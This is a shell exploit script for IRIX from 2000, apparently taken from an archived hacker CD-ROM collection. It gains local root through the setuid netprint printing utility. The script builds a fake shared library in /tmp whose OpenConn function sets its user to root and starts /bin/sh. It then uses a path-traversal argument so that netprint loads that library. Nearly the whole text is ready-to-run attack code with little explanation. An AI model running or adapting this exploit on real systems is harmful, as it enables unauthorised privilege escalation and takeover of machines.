home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / irix / irx_netprint.txt < prev    next >
Encoding:
Text File  |  2002-10-22  |  1.5 KB  |  42 lines
  1. #!/bin/sh
  2. ## copyright LAST STAGE OF DELIRIUM jul 2000 poland            *://lsd-pl.net/ #
  3. ## /usr/lib/print/netprint                                                     #
  4. ##                                                                             #
  5. ## This code gets released due to another post to the Bugtraq mailing list.    #
  6. ## For IRIX 6.3 and above this privilage escalation attack can be conducted    #
  7. ## by local lp users only.                                                     #
  8.  
  9.  
  10. EXECUTABLE=/usr/lib/print/netprint
  11. LIBRARY=lsd
  12. DIRECTORY=/tmp
  13.  
  14. cd $DIRECTORY
  15. cat > $LIBRARY.c << 'EOF'
  16. OpenConn(){
  17.     printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland  //lsd-pl.net/\n");
  18.     printf("/usr/lib/print/netprint for irix 5.3 6.2 6.3 6.4 6.5 6.5.11 IP:all\n");
  19.     printf("\n");
  20.     setreuid(getuid(),0);setuid(0);setgid(0);
  21.     execl("/bin/sh","sh",0);
  22. }
  23. CloseConn(){} ListPrinters(){} SendJob(){} CancelJob(){} WaitForJob(){}
  24. GetQueue(){} StartTagging(){} StopTagging(){} Install(){} AddTimeout(){}
  25. RemoveSemiColons(){} ListAllPrinters(){} CreateInterface(){} InstallPrinter(){}
  26. InstallIcon(){} SockRead(){} IsDest(){} BSDSendJob(){}
  27. EOF
  28. cc -c $LIBRARY.c  -o $LIBRARY.o
  29. ld -shared $LIBRARY.o -o $LIBRARY.so
  30. rm -rf $LIBRARY.[co] so_locations
  31. if [ ! -f "$LIBRARY.so" ]
  32.     then
  33.     echo "error: building library"
  34.     exit 1
  35. fi
  36. chmod 666 $LIBRARY.so
  37.  
  38. $EXECUTABLE -n ../../../../$DIRECTORY/$LIBRARY -h localhost -p lalala bzz-zz
  39.  
  40.  
  41.  
  42.